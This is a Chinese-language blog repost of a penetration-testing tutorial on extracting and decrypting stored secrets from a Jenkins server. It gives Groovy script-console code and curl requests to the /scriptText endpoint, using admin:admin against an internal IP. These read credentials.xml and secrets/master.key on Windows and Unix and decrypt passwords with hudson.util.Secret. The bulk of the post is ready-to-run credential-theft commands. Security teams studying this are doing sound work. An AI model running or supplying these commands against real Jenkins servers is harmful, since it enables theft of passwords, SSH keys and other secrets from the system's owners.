Jenkins-解密 certificate.xml

Andrew 2020-10-11
Web安全 发布于 2020-10-11 15:02:02 阅读 38 评论 0

如果您发现自己在具有脚本控制台访问权限的Jenkins机器上,则可以通过以下方式解密certificate.xml中保存的密码:

hashed_pw =’$ PASSWORDHASH’
passwd = hudson.util.Secret.decrypt(hashed_pw)
println(passwd)

您需要在Jenkins系统本身上执行此操作,因为它正在使用本地master.key和 hudson.util.Secret

下面的屏幕截图

Jenkins-解密certificate.xml
从脚本控制台获得credential .xml的代码

Windows
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = ‘cmd.exe /c type credentials.xml’.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println “out> $sout err> $serr”

*nix
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = ‘cat credentials.xml’.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println “out> $sout err> $serr”

Jenkins-解密certificate.xml

如果您只想使用curl执行此操作,则可以点击scriptText端点并执行如下操作:

Windows:
curl -u admin:admin 10.0.0.160:8080/scriptText –data “script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run”

Also because this syntax took me a minute to figure out for files in subdirectories:
curl -u admin:admin 10.0.0.160:8080/scriptText –data “script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+s**ecrets%5C\master.key**%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run

*nix
curl -u admin:admin 10.0.0.160:8080/scriptText –data “script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cat+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run”

Then to decrypt any passwords:
curl -u admin:admin 10.0.0.160:8080/scriptText –data “script=println(hudson.util.Secret.fromString(‘7pXrOOFP1XG62UsWyeeSI1m06YaOFI3s26WVkOsTUx0=’).getPlainText())”

Jenkins-解密certificate.xml

如果您处在可以访问文件但无法访问jenkins的位置,则可以使用:https://github.com/tweksteen/jenkins-decry...

python在执行正则表达式时有一个小错误,在写这篇文章时还没有修复它。但是这里是版本,而不是正则表达式,我只是打印出值,您可以看到解密后的密码。更改是第55行。

Jenkins-解密certificate.xml

3月19日:脚本只对密码进行regexs(第72行),如果有ssh密钥或其他秘密,您可能需要交换regex…读取credentials.xml文件:-)

4月19日:这条推文概述了另一种类似的方式https://twitter.com/netmux/status/11152378...

原文链接:http://carnal0wnage.attackresearch.com/201...

本作品采用《CC 协议》,转载必须注明作者和本文链接
讨论数量: 0
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!